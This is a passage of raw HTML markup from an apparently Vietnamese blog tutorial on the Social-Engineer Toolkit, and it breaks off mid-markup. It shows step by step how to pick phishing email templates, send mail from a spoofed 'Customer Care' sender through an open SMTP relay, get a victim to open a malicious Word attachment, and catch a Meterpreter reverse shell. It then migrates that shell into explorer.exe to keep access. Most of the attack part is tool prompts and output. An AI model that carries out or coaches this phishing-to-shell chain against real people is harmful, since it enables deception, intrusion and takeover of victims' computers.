class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Defined <\/span><span class=\"crayon-i\">Template<\/span><\/div>\n<div id=\"crayon-55f29ee9765af093471807-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2.<\/span> <span class=\"crayon-v\">One<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Time <\/span><span class=\"crayon-st\">Use<\/span> <span class=\"crayon-e\">Email <\/span><span class=\"crayon-e\">Template<\/span><\/div>\n<div id=\"crayon-55f29ee9765af093471807-6\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765af093471807-7\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div id=\"crayon-55f29ee9765af093471807-8\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>ch\u1ecdn <strong>10.<\/strong> <strong>Status Report<\/strong><\/p>\n<div id=\"crayon-55f29ee9765b5626409148\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765b5626409148-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765b5626409148-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765b5626409148-1\" class=\"crayon-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Available <\/span><span class=\"crayon-v\">templates<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Baby <\/span><span class=\"crayon-i\">Pics<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-3\" class=\"crayon-line\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Strange <\/span><span class=\"crayon-e\">internet <\/span><span class=\"crayon-e\">usage <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">your <\/span><span class=\"crayon-i\">computer<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Computer <\/span><span class=\"crayon-i\">Issue<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-5\" class=\"crayon-line\"><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Order <\/span><span class=\"crayon-i\">Confirmation<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Dan <\/span><span class=\"crayon-i\">Brown<\/span>&#8216;<span class=\"crayon-i\">s<\/span> <span class=\"crayon-v\">Angels<\/span> <span class=\"crayon-o\">&amp;<\/span> <span class=\"crayon-i\">Demons<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-7\" class=\"crayon-line\"><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-r\">New<\/span> <span class=\"crayon-i\">Update<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">How <\/span><span class=\"crayon-t\">long<\/span> <span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-v\">been<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-9\" class=\"crayon-line\"><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-10\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">9<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Have <\/span><span class=\"crayon-e\">you <\/span><span class=\"crayon-e\">seen <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-11\" class=\"crayon-line\"><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-e\">Status <\/span><span class=\"crayon-i\">Report<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-12\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">11<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-v\">WOAAAA<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span> <span class=\"crayon-r\">This<\/span> <span class=\"crayon-st\">is<\/span> <span class=\"crayon-v\">crazy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-13\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">10<\/span><\/div>\n<div id=\"crayon-55f29ee9765b5626409148-14\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>B\u01b0\u1edbc 8:<\/strong> thi\u1ebft l\u1eadp c\u00e1c gi\u00e1 tr\u1ecb g\u1eedi, ng\u01b0\u1eddi nh\u1eadn, smtp.<\/p>\n<div id=\"crayon-55f29ee9765bb250600696\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765bb250600696-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765bb250600696-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765bb250600696-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765bb250600696-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765bb250600696-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765bb250600696-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765bb250600696-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765bb250600696-1\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">Send <\/span><span class=\"crayon-e\">email <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">vuquyhoa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">com<\/span><\/div>\n<div id=\"crayon-55f29ee9765bb250600696-2\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee9765bb250600696-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">1.<\/span> <span class=\"crayon-st\">Use<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">gmail <\/span><span class=\"crayon-e\">Account <\/span><span class=\"crayon-st\">for<\/span> <span class=\"crayon-e\">your <\/span><span class=\"crayon-e\">email <\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765bb250600696-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">2.<\/span> <span class=\"crayon-st\">Use<\/span> <span class=\"crayon-e\">your <\/span><span class=\"crayon-e\">own <\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-st\">or<\/span> <span class=\"crayon-e\">open <\/span><span class=\"crayon-e\">relay<\/span><\/div>\n<div id=\"crayon-55f29ee9765bb250600696-5\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765bb250600696-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">2<\/span><\/div>\n<div id=\"crayon-55f29ee9765bb250600696-7\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>Ch\u1ecdn<strong> 2<\/strong>: g\u1eedi b\u1eb1ng <strong>SMTP replay<\/strong> . Option 1 hi\u1ec7n nay kh\u00f3 ho\u1ea1t \u0111\u1ed9ng v\u00ec Gmail \u0111\u00e3 ch\u1eb7n.<\/p>\n<div id=\"crayon-55f29ee9765c0953529798\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c0953529798-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c0953529798-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c0953529798-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c0953529798-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c0953529798-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c0953529798-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c0953529798-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c0953529798-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c0953529798-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c0953529798-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765c0953529798-1\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">From <\/span><span class=\"crayon-e\">address<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ex<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-v\">moo<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">example<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">me<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">vuquyhoa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">com<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">FROM <\/span><span class=\"crayon-e\">NAME <\/span><span class=\"crayon-e\">user <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-v\">see<\/span><span class=\"crayon-o\">:<\/span> <span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">Customer <\/span><span class=\"crayon-e\">Care\u00a0\u00a0<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-3\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">Username <\/span><span class=\"crayon-st\">for<\/span> <span class=\"crayon-v\">open<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">relay<\/span> <span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">blank<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">me<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">vuquyhoa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">com<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-e\">Password <\/span><span class=\"crayon-st\">for<\/span> <span class=\"crayon-v\">open<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">relay<\/span> <span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">blank<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-5\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">SMTP <\/span><span class=\"crayon-e\">email <\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-e\">address<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ex<\/span><span class=\"crayon-sy\">.<\/span> <span class=\"crayon-v\">smtp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">youremailserveryouown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">xx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xx<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">Port <\/span><span class=\"crayon-e\">number <\/span><span class=\"crayon-st\">for<\/span> <span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">SMTP <\/span><span class=\"crayon-i\">server<\/span> <span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">25<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-7\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-e\">Flag <\/span><span class=\"crayon-r\">this<\/span> <span class=\"crayon-v\">message<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">s<\/span> <span class=\"crayon-st\">as<\/span> <span class=\"crayon-e\">high <\/span><span class=\"crayon-v\">priority<\/span><span class=\"crayon-sy\">?<\/span> <span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">yes<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-i\">yes<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">SET <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">finished <\/span><span class=\"crayon-e\">delivering <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">emails<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-9\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-i\">Setup<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-i\">listener<\/span> <span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">yes<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-i\">yes<\/span><\/div>\n<div id=\"crayon-55f29ee9765c0953529798-10\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>Listener ch\u1ecdn yes \u0111\u1ec3 <strong>\u201cSET\u201d<\/strong> t\u1ef1 \u0111\u1ed9ng kh\u1edfi \u0111\u1ed9ng <strong>MSF<\/strong> l\u1eafng nghe k\u1ebft n\u1ed1i<\/p>\n<p><strong>B\u01b0\u1edbc 9:<\/strong> Qua m\u00e1y victim ki\u1ec3m tra email. Download v\u00e0 Open v\u0103n b\u1ea3n<\/p>\n<p><a href=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-06-30.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-395\" src=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-06-30.png\" alt=\"Windows 7-2014-09-06-14-06-30\" width=\"1596\" height=\"747\" title=\"\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Email \u0111\u00e3 \u0111\u01b0\u1ee3c g\u1eedi \u0111\u1ebfn h\u00f2m mail c\u1ee7a victim<\/p>\n<p><a href=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-06-48.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-396\" src=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-06-48.png\" alt=\"Windows 7-2014-09-06-14-06-48\" width=\"1596\" height=\"747\" title=\"\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Download t\u1eadp tin \u0111\u00ednh k\u00e8m v\u00e0 m\u1edf b\u1eb1ng Word 2007 m\u1eb7c \u0111\u1ecbnh<\/p>\n<p><a href=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-07-10.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-397\" src=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-07-10.png\" alt=\"Windows 7-2014-09-06-14-07-10\" width=\"1596\" height=\"747\" title=\"\"><\/a><\/p>\n<p>Sau khi m\u1edf th\u1ea5y Word \u1edf tr\u1ea1ng th\u00e1i treo<\/p>\n<p><a href=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-07-16.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-398\" src=\"http:\/\/vuquyhoa.com\/wp-content\/uploads\/2014\/09\/Windows-7-2014-09-06-14-07-16.png\" alt=\"Windows 7-2014-09-06-14-07-16\" width=\"1596\" height=\"747\" title=\"\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Quay tr\u1edd l\u1ea1i m\u00e1y c\u1ee7a <strong>Attacker<\/strong> \u0111\u00e3 th\u1ea5y c\u00f3 <strong>meterpreter shell.<\/strong><\/p>\n<div id=\"crayon-55f29ee9765c9712866008\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c9712866008-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c9712866008-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c9712866008-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c9712866008-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c9712866008-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765c9712866008-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765c9712866008-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee9765c9712866008-1\" class=\"crayon-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Started <\/span><span class=\"crayon-e\">reverse <\/span><span class=\"crayon-e\">handler <\/span><span class=\"crayon-i\">on<\/span> <span class=\"crayon-cn\">10.0.0.131<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">443<\/span><\/div>\n<div id=\"crayon-55f29ee9765c9712866008-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Starting <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">payload <\/span><span class=\"crayon-v\">handler<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee9765c9712866008-3\" class=\"crayon-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Sending <\/span><span class=\"crayon-e\">stage<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">769536<\/span> <span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-st\">to<\/span> <span class=\"crayon-cn\">10.0.0.4<\/span><\/div>\n<div id=\"crayon-55f29ee9765c9712866008-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">]<\/span> <span class=\"crayon-e\">Meterpreter <\/span><span class=\"crayon-i\">session<\/span> <span class=\"crayon-cn\">1<\/span> <span class=\"crayon-e\">opened<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10.0.0.131<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">443<\/span> <span class=\"crayon-o\">-&gt;<\/span> <span class=\"crayon-cn\">10.0.0.4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">49207<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-i\">at<\/span> <span class=\"crayon-cn\">2014<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">06<\/span> <span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">12<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0400<\/span><\/div>\n<div id=\"crayon-55f29ee9765c9712866008-5\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee9765c9712866008-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-e\">msf <\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">handler<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-o\">&gt;<\/span><\/div>\n<div id=\"crayon-55f29ee9765c9712866008-7\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>K\u1ebft n\u1ed1i v\u00e0o <strong>session meterpreter<\/strong> . <strong>Migrate<\/strong> sang process<strong> explorer.exe<\/strong> tr\u00e1nh tr\u01b0\u1eddng h\u1ee3p victim t\u1eaft Word th\u00ec m\u1ea5t k\u1ebft n\u1ed1i.<\/p>\n<div id=\"crayon-55f29ee9765d0910404999\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee9765d0910404999-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee9765d0910404999-12\">12<\/div>\n<div class=\"crayon-num\" 